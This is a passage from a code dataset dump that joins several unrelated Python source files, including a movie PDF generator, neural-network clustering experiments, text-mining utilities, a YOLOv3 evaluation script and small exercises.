/////////////////////////////////////////////////////////////////////////////////////////////////\n\n production_country_data = Movies.if_production_country(id)\n production_country_data = production_country_data[0]\n\n countries = production_country_data['countries']\n\n if countries == None:\n countries = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n spoken_language_data = Movies.if_spoken_languages(id)\n spoken_language_data = spoken_language_data[0]\n\n spoken_languages = spoken_language_data['languages']\n\n if spoken_languages == None:\n spoken_languages = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n production_company_data = Movies.if_production_company(id)\n production_company_data = production_company_data[0]\n\n company = production_company_data['company']\n\n if company == None:\n company = 'No data available'\n\n # /////////////////////////////////////////////////////////////////////////////////////////////////\n\n file = open('template.html', 'r')\n html_file = file.read()\n\n html_file = html_file.format(language=language, release_date=release_date,\n title=title, overview=overview, original_language=original_language,\n status=status, runtime=runtime, vote_average=vote_average, spoken_languages=spoken_languages, countries=countries,\n genres=genres, company=company)\n\n path_to_file = PDF_DIRECTORY + safe_title(title) + '-download.pdf'\n 
pdfkit.from_string(html_file, path_to_file)\n\n    return path_to_file\n","repo_name":"Tiinzzy/movie-lookup","sub_path":"backend-api/create_pdf.py","file_name":"create_pdf.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2400204585","text":"#print first 10 odd and even numbers using iterators and compress.\r\ndef check_even(n):\r\n    for i in range(2,n+1):\r\n        if i % 2 == 0:\r\n            yield i\r\ndef check_odd(n):\r\n    for i in range(1,n):\r\n        if i % 2 != 0:\r\n            yield i\r\n    \r\neven_numbers = iter(check_even(20))\r\nodd_numbers = iter(check_odd(20))\r\nprint(\"List of first 10 even numbers\")\r\nfor i in even_numbers:\r\n    print(i)\r\nprint(\"List of first 10 odd numbers\")\r\nfor i in odd_numbers:\r\n    print(i)\r\n","repo_name":"Samrat-Das-02/Python","sub_path":"A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39087129271","text":"from neural_net import ObservableNet, sum_columns\nfrom sklearn.cluster import DBSCAN, KMeans, AgglomerativeClustering\nfrom multiprocessing import Process\nimport pandas as pd\nfrom os import getcwd, path\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\nimport logging\n\ndbscan_params_1 = [1 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_2 = [5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_3 = [2.5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params_4 = [7.5 * 10 ** ((-1) * (i + 1)) for i in range(10)]\ndbscan_params = dbscan_params_1 + dbscan_params_2 + dbscan_params_3 + dbscan_params_4\ncolumns = ['removed_label', 'accuracy', 'summed_vectors', 'label', 'epsilon', 'layer', 'g_w']\ndir = getcwd() + '/results.csv'\npath_layer = getcwd() + '/grads.csv'\npath_layer2 = getcwd() + '/weights.csv'\n\n\ndef remove_clusters_evaluate(label, vectors, observable_net, layer):\n    results = list()\n    label_set = set(label)\n    observable_net.save_status()\n    for l in label_set:\n        for i, vector in enumerate(vectors):\n            if label[i] == l:\n                observable_net.remove_neuron(layer + 1, i)\n        eval = observable_net.test()\n        results.append((l, eval))\n        observable_net.reset()\n    return results\n\ndef remove_specific(label, observable_net, layer, remove_label=0):\n    for i, l in enumerate(label):\n        if l == remove_label:\n            observable_net.remove_neuron(layer + 1, i)\n\n\n\ndef create_ref_architecture():\n    observable_net = ObservableNet(784)\n    observable_net.add_layer(512, name='hidden', seed=5034)\n    observable_net.add_layer(256, name='hidden2', seed=6456)\n    observable_net.add_layer(128, name='hidden3', seed=7675)\n    observable_net.add_layer(64, name='hidden4', seed=8345)\n    observable_net.add_layer(10, name='output', activation='linear', seed=997)\n    test_results = observable_net.train(36)\n\n    return observable_net, test_results\n\n\ndef create_time_vectors():\n    create_dataset()\n    net, test_results = create_ref_architecture()\n    time_vectors_gradients = [net.create_time_vectors('gradient', layer) for layer in range(5)]\n    time_vectors_weights = [net.create_time_vectors('weight', layer) for layer in range(5)]\n\n    save_layer(time_vectors_gradients, test_results)\n    save_layer(time_vectors_weights, test_results, grads=False)\n\n    return net, time_vectors_gradients, time_vectors_weights\n\n\ndef start_dbscan_evaluation():\n    net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n    for epsilon in dbscan_params_1:\n        
for i, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, epsilon, i, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'g')\n\n for epsilon in dbscan_params_1:\n for i, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n if len(set(label)) == 1:\n save_results(label[0], 0, summed_vectors, label, epsilon, i, 'w')\n else:\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'w')\n\n\ndef start_kmeans_evaluation():\n net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'w')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'w')\n\n\ndef start_hac_evaluation():\n net, time_vectors_gradients, time_vectors_weights = create_time_vectors()\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n for i in range(70):\n i = i + 1\n for x, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'w')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'w')\n\n\ndef do_hac(i, net, time_vectors_gradients):\n i = i + 1\n for x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = AgglomerativeClustering(n_clusters=i).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n\ndef do_kmeans(i, net, time_vectors_gradients):\n i = i + 1\n for 
x, layer in enumerate(time_vectors_gradients[:-1]):\n summed_vectors = sum_columns(layer)\n label = KMeans(n_clusters=i, random_state=3125).fit_predict(summed_vectors)\n results = remove_clusters_evaluate(label, summed_vectors, net, x)\n if len(results) == 1:\n save_results(results[0][0], 0, summed_vectors, label, i, x, 'g')\n else:\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, i, x, 'g')\n\n\ndef do_dbscan(epsilon, net, time_vectors_weights):\n for i, layer in enumerate(time_vectors_weights[:-1]):\n summed_vectors = sum_columns(layer)\n label = DBSCAN(eps=epsilon).fit_predict(summed_vectors)\n if len(set(label)) == 1:\n save_results(label[0], 0, summed_vectors, label, epsilon, i, 'w')\n else:\n results = remove_clusters_evaluate(label, summed_vectors, net, i)\n for result in results:\n save_results(result[0], result[1], summed_vectors, label, epsilon, i, 'w')\n\n\ndef save_results(removed_label, accuracy, summed_vectors, label, epsilon, layer, g_w):\n new_data = pd.DataFrame([(removed_label, accuracy, summed_vectors, label, epsilon, layer, g_w)], columns=columns)\n with open(dir, 'a') as f:\n new_data.to_csv(f, header=False, index=False)\n\n\ndef save_layer(layers, test, grads=True):\n tuples = list()\n for layer in layers:\n tuples.append((layer, test))\n to_save = pd.DataFrame(tuples, columns=['layer', 'accuracy'])\n if grads:\n to_save.to_csv(path_layer)\n else:\n to_save.to_csv(path_layer2)\n\n\ndef create_dataset():\n dataset = pd.DataFrame(columns=columns)\n dataset.to_csv(dir, index=False)\n\n\ndef best_results(path):\n results = pd.read_csv(path)\n results = results.loc[results['g_w'] == 'g']\n best_acc = results.groupby('layer')['accuracy'].max()\n b_r = pd.DataFrame(columns=results.columns)\n for acc in best_acc:\n b_r = b_r.append(results.loc[acc == results.accuracy])\n b_r = b_r.groupby(['layer', 'g_w'])['epsilon'].min()\n print(b_r)\n\n\ndef reproduce_result(layer, param, net, time_vectors_gradients, time_vectors_weights,\n grad=1, clustering='dbscan', remove_label=0):\n if clustering == 'dbscan':\n if grad == 1:\n label = DBSCAN(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = DBSCAN(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n elif clustering == 'kmeans':\n if grad == 1:\n label = KMeans(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = KMeans(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n elif clustering == 'hac':\n if grad == 1:\n label = AgglomerativeClustering(param).fit_predict(sum_columns(time_vectors_gradients[layer]))\n else:\n label = AgglomerativeClustering(param).fit_predict(sum_columns(time_vectors_weights[layer]))\n else:\n raise ValueError('clustering param unknown')\n if grad == 1:\n remove_specific(label, net, layer, remove_label=remove_label)\n else:\n remove_specific(label, net, layer, remove_label=remove_label)\n\n\ndef merge_all():\n hac_all = pd.read_csv(getcwd() + '/Results/hac.csv')\n for i in [x for x in range(47) if x % 5 == 0]:\n if path.isfile(getcwd() + '/Results17.04/Hac_g' + str(i) + '.csv'):\n hac_all = hac_all.append(pd.read_csv(getcwd() + '/Results17.04/Hac_g' + str(i) + '.csv'))\n if path.isfile(getcwd() + '/Results17.04/Hac_w' + str(i) + '.csv'):\n hac_all = hac_all.append(pd.read_csv(getcwd() + '/Results17.04/Hac_w' + str(i) + '.csv'))\n kmeans_all = pd.read_csv(getcwd() + '/Results/KMeans.csv')\n for i in [x for x in range(47) if x % 5 == 0]:\n if path.isfile(getcwd() + '/Results17.04/KMeans_g' + 
str(i)):\n kmeans_all = kmeans_all.append(pd.read_csv(getcwd() + '/Results17.04/KMeans_g' + str(i) + '.csv'))\n if path.isfile(getcwd() + '/Results17.04/KMeans_w' + str(i) + '.csv'):\n kmeans_all = kmeans_all.append(pd.read_csv(getcwd() + '/Results17.04/KMeans_w' + str(i) + '.csv'))\n hac_all.to_csv(getcwd() + '/Results/Hac_all.csv')\n kmeans_all.to_csv(getcwd() + '/Results/KMeans_all.csv')\n\ndef plot_time_vectors(summed_vectors, clustered=False):\n\n label = DBSCAN(0.025).fit_predict(summed_vectors)\n summed_vectors = PCA().fit_transform(summed_vectors)\n cmap = []\n for l in label:\n if l == 0:\n cmap.append('r')\n else:\n cmap.append('k')\n plt.scatter(summed_vectors[:, 0], summed_vectors[:, 1], c=cmap)\n plt.show()\n\n\nif __name__ == \"__main__\":\n net, tg, tw = create_time_vectors()\n # for i in range(10):\n # i = i + 20\n # do_kmeans(i, net, time_vectors_gradients)\n # print('Done')\n # merge_all()\n\n # start_hac_evaluation()\n #best_results(getcwd() + '/Results/Hac_all.csv')\n #l = 1\n #reproduce_result(0, 0.025, net, tg, tw)\n #reproduce_result(1, 48, net, tg, tw, clustering='hac', remove_label=46)\n #reproduce_result(2, 46, net, tg, tw, clustering='hac', remove_label=22)\n reproduce_result(3, 22, net, tg, tw, clustering='hac', remove_label=18)\n\n print(net.test(testing=0))\n print(net.test(testing=1))\n\n #plot_time_vectors(sum_columns(tg[0]))\n #plot_time_vectors(sum_columns(tg[1]))\n #plot_time_vectors(sum_columns(tg[2]))\n #plot_time_vectors(sum_columns(tg[3]))\n\n# best_results(getcwd()+'/Results/Hac_all.csv')\n# best_results(getcwd()+'/Results/KMeans_all.csv')\n","repo_name":"MartinWehking/Visualizing-the-Learning-Process-of-Neural-Networks","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":12492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950329803","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 25 12:27:17 2017\n\n@author: DA\n\"\"\"\n\nexec(open('../data_utils_py3.py').read())\n\nimport numpy as np\n\nfrom pathlib import Path\nimport os\n\nX_train, y_train, X_test, y_test = load_CIFAR10(str(Path(os.getcwd()).parents[1])+'/data/cifar-10-batches-py')\n\n# Subsample the data\nnum_training = 47000\nnum_validation = 2000\nnum_test = 1000\n\n# Generating validation set\nmask = range(num_training, num_training + num_validation)\nX_val = X_train[mask]\ny_val = y_train[mask]\n\n# Generating training set\nmask = range(num_training)\nX_train = X_train[mask]\ny_train = y_train[mask]\n\n# Generating test set\nmask = range(num_test)\nX_test = X_test[mask]\ny_test = y_test[mask]\n\n# Reshape the image data from 3D matrices into vectors\nX_train = np.reshape(X_train, (X_train.shape[0], -1))\nX_val = np.reshape(X_val, (X_val.shape[0], -1))\nX_test = np.reshape(X_test, (X_test.shape[0], -1))\n\n# Centering data\nmean_image = np.mean(X_train, axis = 0)\n\nX_train -= mean_image\nX_val -= mean_image\nX_test -= mean_image\n\n# Clean up\ndel mask, num_test, num_training, num_validation, mean_image\n","repo_name":"DataDan01/CS231n-Notes","sub_path":"Assignment 2/Clean Attempt/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27899989559","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\r\nfrom sklearn.pipeline import Pipeline\r\nfrom 
sklearn.preprocessing import Normalizer\r\n\r\nfrom .base import (\r\n    counter_to_dataframe,\r\n    duplication_remover,\r\n    keyword_list,\r\n    keyword_parser,\r\n    word_counter,\r\n)\r\n\r\n\r\ndef keyword_dataframe(df):\r\n    \"\"\"키워드 단어 빈도\"\"\"\r\n    if isinstance(df, pd.DataFrame):\r\n        lis = keyword_list(df)\r\n        keywords = keyword_parser(lis)\r\n        counter = word_counter(keywords)\r\n        df = counter_to_dataframe(counter)\r\n        return df\r\n    else:\r\n        raise TypeError(\"input type must be a DataFrame\")\r\n\r\n\r\ndef keyword_dataframe_no_duplicated(df):\r\n    \"\"\"키워드 중복 제거 단어 빈도\"\"\"\r\n    if isinstance(df, pd.DataFrame):\r\n        lis = keyword_list(df)\r\n        keywords = keyword_parser(lis)\r\n        keywords_set = duplication_remover(keywords)\r\n        counter = word_counter(keywords_set)\r\n        df = counter_to_dataframe(counter)\r\n        return df\r\n    else:\r\n        raise TypeError(\"input type must be a DataFrame\")\r\n\r\n\r\ndef tfidf(df, *press):\r\n    \"\"\"키워드 상대 빈도\"\"\"\r\n    if isinstance(df, pd.DataFrame):\r\n        if isinstance(press, str):\r\n            df = df[press]\r\n        lis = keyword_list(df)\r\n\r\n        tfidfv = TfidfVectorizer()\r\n        tdm = tfidfv.fit_transform(lis)\r\n\r\n        word_count = (\r\n            pd.DataFrame(\r\n                {\r\n                    \"단어\": tfidfv.get_feature_names_out(),\r\n                    \"빈도\": tdm.sum(axis=0).flat,\r\n                },\r\n            )\r\n            .sort_values(\"빈도\", ascending=False)\r\n            .reset_index(drop=True)\r\n        )\r\n        return word_count\r\n    else:\r\n        raise TypeError(\"input type must be a DataFrame\")\r\n\r\n\r\ndef tfidf_vector(df):\r\n    \"\"\"tfidf vector\"\"\"\r\n    if isinstance(df, pd.DataFrame):\r\n        lis = keyword_list(df)\r\n        pipeline = Pipeline(\r\n            [\r\n                (\"vect\", CountVectorizer()),\r\n                (\"tfidf\", TfidfTransformer()),\r\n            ],\r\n        )\r\n        vec = pipeline.fit_transform(lis).toarray()\r\n        return vec\r\n    else:\r\n        raise TypeError(\"input type must be a DataFrame\")\r\n\r\n\r\ndef normalize_vector(vec):\r\n    \"\"\"normalize vector\"\"\"\r\n    if isinstance(vec, np.ndarray):\r\n        vec_nor = Normalizer().fit_transform(vec)\r\n        return vec_nor\r\n    else:\r\n        raise TypeError(\"input type must be an ndarray\")\r\n","repo_name":"sorrychoe/pyBigKinds","sub_path":"pyBigKinds/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"17462216677","text":"from datetime import datetime\n\n\nclass Case:\n\n    def __init__(self, info, case_number, citation_number, date_location, type_status, charges, case_detail_link):\n        self.name, birth_year = info\n        self.birth_year = int(birth_year)\n        self.case_number = case_number\n        self.citation_number = citation_number[0] if citation_number else \"\"\n        date, self.location = date_location\n        self.date = datetime.date(datetime.strptime(date, '%m/%d/%Y'))\n        self.violation_type, self.current_status = type_status\n        self.charges = charges\n        self.case_detail_link = case_detail_link\n","repo_name":"htharker42/recordExpung","sub_path":"src/backend/expungeservice/crawler/models/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11173529297","text":"import cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\nimport os\r\n\r\ndirection_div = 12\r\n\r\ndef src_mat(camera_type):\r\n    dic_param = {}\r\n    if camera_type == 'front':\r\n        path_perspect = os.path.dirname(os.path.abspath(__file__))\r\n        with open(path_perspect + \"/test_c.pkl\", 'rb') as 
f:\r\n dic_param = pickle.load(f)\r\n if camera_type == 'back':\r\n path_perspect = os.path.dirname(os.path.abspath(__file__))\r\n with open(path_perspect + \"/test_c.pkl\", 'rb') as f:\r\n dic_param = pickle.load(f)\r\n if len(dic_param) != 0:\r\n return dic_param['pts_src']\r\n else:\r\n return None\r\n\r\ndef wrapping(image, pts_src, camera_type):\r\n (h, w) = (image.shape[0], image.shape[1])\r\n\r\n if camera_type == 'front':\r\n destination = np.float32(\r\n # [[round(w * 0.8), round(h * 0.0)], [round(w * 0.8), round(h * 0.0)],\r\n # [round(w * 0.2), h], [round(w * 0.2), h]]\r\n [[round(w * 0.3), round(h * 0.0)], [round(w * 0.7), round(h * 0.0)],\r\n [round(w * 0.7), h], [round(w * 0.3), h]]\r\n )\r\n if camera_type == 'back':\r\n destination = np.float32(\r\n # [[round(w * 0.8), round(h * 0.0)], [round(w * 0.8), round(h * 0.0)],\r\n # [round(w * 0.2), h], [round(w * 0.2), h]]\r\n [[round(w * 0.3), round(h * 0.0)], [round(w * 0.7), round(h * 0.0)],\r\n [round(w * 0.7), h], [round(w * 0.3), h]]\r\n )\r\n\r\n transform_matrix = cv2.getPerspectiveTransform(pts_src, destination)\r\n minv = cv2.getPerspectiveTransform(destination, pts_src)\r\n _image = cv2.warpPerspective(image, transform_matrix, (w,h))\r\n\r\n return _image, minv\r\n\r\ndef bird_convert(img, camera_type):\r\n srcmat = src_mat(camera_type)\r\n img_warpped, minverse = wrapping(img, srcmat, camera_type)\r\n\r\n return img_warpped","repo_name":"Gynjn/Contest","sub_path":"birdeye.py","file_name":"birdeye.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18504007785","text":"import pytorch_lightning as pl\nimport torch\nfrom .config import cfg\nfrom .tokenizer import CharLevelTokenizer\nimport pandas as pd\n\n\nclass WordDataset(torch.utils.data.Dataset):\n def __init__(self, tokenizer, csv_path, indices=None):\n super().__init__()\n self.raw = pd.read_csv(csv_path).dropna(axis=0)\n self.tokenizer = tokenizer\n # Use indices if given, else use whole csv\n self.indices = indices if not indices is None else list(range(len(self.raw)))\n\n def set_mode(self, mode):\n assert mode in [\"train\", \"val\"]\n self.mode = mode\n\n def __getitem__(self, idx):\n idx = self.indices[idx]\n word = self.raw.iloc[idx % len(self.raw), 0]\n description = self.raw.iloc[idx % len(self.raw), 1]\n if self.mode == \"val\":\n seed = idx # Use deterministic masking when validating\n else:\n seed = None\n tokens, mask_ids, label = self.tokenizer.encode(\n word, description, mode=self.mode, seed=seed\n )\n tokens = torch.LongTensor(tokens)\n label = torch.LongTensor(label)\n\n one_hot_mask_ids = torch.zeros_like(tokens)\n one_hot_mask_ids[mask_ids] = 1\n # if label.shape[0] != 400:\n # print(one_hot_mask_ids.shape, label.shape, self.mode)\n label = label.masked_fill(\n ~one_hot_mask_ids.bool(),\n self.tokenizer.tokens_to_ids[cfg.TOKENIZATION.pad_token],\n )\n return tokens, one_hot_mask_ids, label\n\n def __len__(self):\n if self.mode == \"val\":\n # when validating, use different masks of the same example to get a better estimate of performance\n return len(self.indices) * cfg.TRAIN.repeat_val_dataset\n return len(self.indices)\n\n\nclass WordDataModule(pl.LightningDataModule):\n def __init__(self, tokenizer, csv_path):\n super().__init__()\n tmp = pd.read_csv(csv_path).dropna(axis=0)\n all_idx = list(range(len(tmp)))\n\n from sklearn.model_selection import train_test_split\n\n train_idx, val_idx = train_test_split(all_idx, 
train_size=cfg.TRAIN.train_size)\n\n self.train = WordDataset(tokenizer, csv_path, indices=train_idx)\n self.train.set_mode(\"train\")\n self.val = WordDataset(tokenizer, csv_path, indices=val_idx)\n self.val.set_mode(\"val\")\n\n def train_dataloader(self):\n dl = torch.utils.data.DataLoader(\n self.train,\n batch_size=cfg.TRAIN.batch_size,\n shuffle=True,\n num_workers=cfg.TRAIN.num_workers,\n )\n return dl\n\n def val_dataloader(self):\n dl = torch.utils.data.DataLoader(\n self.val,\n batch_size=cfg.TRAIN.batch_size,\n shuffle=False,\n num_workers=cfg.TRAIN.num_workers,\n )\n return dl\n","repo_name":"ojus1/WordGuesser","sub_path":"core/WordDataModule.py","file_name":"WordDataModule.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1635440183","text":"# coding:utf-8\n\n# 常量\n\nIMAGE_CODE_REDIS_EXPIRES = 120 # 图片验证码在redis的保存时间\nSMS_CODE_REDIS_EXPIRES = 300 # 短信验证码在redis的保存时间\nQINIU_URL_DOMAIN = 'http://p7kohmjxl.bkt.clouddn.com/' # 七牛域名\\\nLOGIN_ERROR_MAX_NUM = 5\nLOGIN_ERROR_FORBID_TIME = 600\nAREA_INFO_REDIS_EXPIRES = 3600","repo_name":"Daiiyue/aijia","sub_path":"ihome/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9308406949","text":"# -*- encoding: utf-8 -*-\n\n__author__ = 'pp'\n__date__ = '6/26/14'\n\n\nimport unittest\nimport json\n\nfrom georest import geo\nfrom georest.model import OperationsModel, AttributesModel\nfrom georest.model.operations import NoSuchOperation, BadInvoke\n\n\nclass TestOperationsModel(unittest.TestCase):\n def setUp(self):\n self.model = OperationsModel()\n\n def test_no_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"Point\",\"coordinates\":[30,10]}')\n with self.assertRaises(NoSuchOperation):\n self.model.invoke('kangaroo', geom)\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('length')\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('length', geom, geom)\n\n with self.assertRaises(BadInvoke):\n self.model.invoke('difference', geom)\n\n def test_pod_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"LineString\",\"coordinates\":[[10.0,0.0],[10.0,10.0]]}')\n result = self.model.invoke('length', geom)\n self.assert_(result.is_pod)\n self.assertEqual(result.value, 10.0)\n\n def test_geom_op(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"Point\",\"coordinates\":[30,10]}')\n result = self.model.invoke('centroid', geom)\n self.assertFalse(result.is_pod)\n self.assert_(geom.equals(result.value))\n\n\nclass TestAttributesModel(unittest.TestCase):\n def setUp(self):\n self.model = AttributesModel()\n\n def test_attributes(self):\n geom = geo.Geometry.build_geometry('{\"type\":\"LineString\",\"coordinates\":[[10.0,0.0],[10.0,10.0]]}')\n\n # unknown attributes are just ignored\n result = self.model.attributes(geom, includes=['ballistic'])\n self.assertEqual(json.loads(result), {'length': 10.0})\n","repo_name":"Kotaimen/georest","sub_path":"tests/model/test_operations.py","file_name":"test_operations.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11587783823","text":"import cv2\nimport os\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport core.utils as utils\nfrom core.config import cfg\nfrom core.yolov3 import YOLOv3, decode\n\n\nINPUT_SIZE = 
416\nNUM_CLASS = len(utils.read_class_names(cfg.YOLO.CLASSES))\nCLASSES = utils.read_class_names(cfg.YOLO.CLASSES)\n\npredicted_dir_path = '../mAP/predicted'\nground_truth_dir_path = '../mAP/ground-truth'\nif os.path.exists(predicted_dir_path): shutil.rmtree(predicted_dir_path)\nif os.path.exists(ground_truth_dir_path): shutil.rmtree(ground_truth_dir_path)\nif os.path.exists(cfg.TEST.DECTECTED_IMAGE_PATH): shutil.rmtree(cfg.TEST.DECTECTED_IMAGE_PATH)\n\nos.mkdir(predicted_dir_path)\nos.mkdir(ground_truth_dir_path)\nos.mkdir(cfg.TEST.DECTECTED_IMAGE_PATH)\n\n# Build Model\ninput_layer = tf.keras.layers.Input([INPUT_SIZE, INPUT_SIZE, 3])\nfeature_maps = YOLOv3(input_layer)\n\nbbox_tensors = []\nfor i, fm in enumerate(feature_maps):\n bbox_tensor = decode(fm, i)\n bbox_tensors.append(bbox_tensor)\n\nmodel = tf.keras.Model(input_layer, bbox_tensors)\nmodel.load_weights(\"./yolov3\")\n\nwith open(cfg.TEST.ANNOT_PATH, 'r') as annotation_file:\n for num, line in enumerate(annotation_file):\n annotation = line.strip().split()\n image_path = annotation[0]\n image_name = image_path.split('/')[-1]\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n bbox_data_gt = np.array([list(map(int, box.split(','))) for box in annotation[1:]])\n\n if len(bbox_data_gt) == 0:\n bboxes_gt=[]\n classes_gt=[]\n else:\n bboxes_gt, classes_gt = bbox_data_gt[:, :4], bbox_data_gt[:, 4]\n ground_truth_path = os.path.join(ground_truth_dir_path, str(num) + '.txt')\n\n print('=> ground truth of %s:' % image_name)\n num_bbox_gt = len(bboxes_gt)\n with open(ground_truth_path, 'w') as f:\n for i in range(num_bbox_gt):\n class_name = CLASSES[classes_gt[i]]\n xmin, ymin, xmax, ymax = list(map(str, bboxes_gt[i]))\n bbox_mess = ' '.join([class_name, xmin, ymin, xmax, ymax]) + '\\n'\n f.write(bbox_mess)\n print('\\t' + str(bbox_mess).strip())\n print('=> predict result of %s:' % image_name)\n predict_result_path = os.path.join(predicted_dir_path, str(num) + '.txt')\n # Predict Process\n image_size = image.shape[:2]\n image_data = utils.image_preporcess(np.copy(image), [INPUT_SIZE, INPUT_SIZE])\n image_data = image_data[np.newaxis, ...].astype(np.float32)\n\n pred_bbox = model.predict(image_data)\n pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\n pred_bbox = tf.concat(pred_bbox, axis=0)\n bboxes = utils.postprocess_boxes(pred_bbox, image_size, INPUT_SIZE, cfg.TEST.SCORE_THRESHOLD)\n bboxes = utils.nms(bboxes, cfg.TEST.IOU_THRESHOLD, method='nms')\n\n\n if cfg.TEST.DECTECTED_IMAGE_PATH is not None:\n image = utils.draw_bbox(image, bboxes)\n cv2.imwrite(cfg.TEST.DECTECTED_IMAGE_PATH+image_name, image)\n\n with open(predict_result_path, 'w') as f:\n for bbox in bboxes:\n coor = np.array(bbox[:4], dtype=np.int32)\n score = bbox[4]\n class_ind = int(bbox[5])\n class_name = CLASSES[class_ind]\n score = '%.4f' % score\n xmin, ymin, xmax, ymax = list(map(str, coor))\n bbox_mess = ' '.join([class_name, score, xmin, ymin, xmax, ymax]) + '\\n'\n f.write(bbox_mess)\n print('\\t' + str(bbox_mess).strip())\n\n","repo_name":"YunYang1994/TensorFlow2.0-Examples","sub_path":"4-Object_Detection/YOLOV3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1712,"dataset":"github-code","pt":"37"} +{"seq_id":"8869425846","text":"\"\"\"\nWrite a program that finds the summation of every number from 1 to num. 
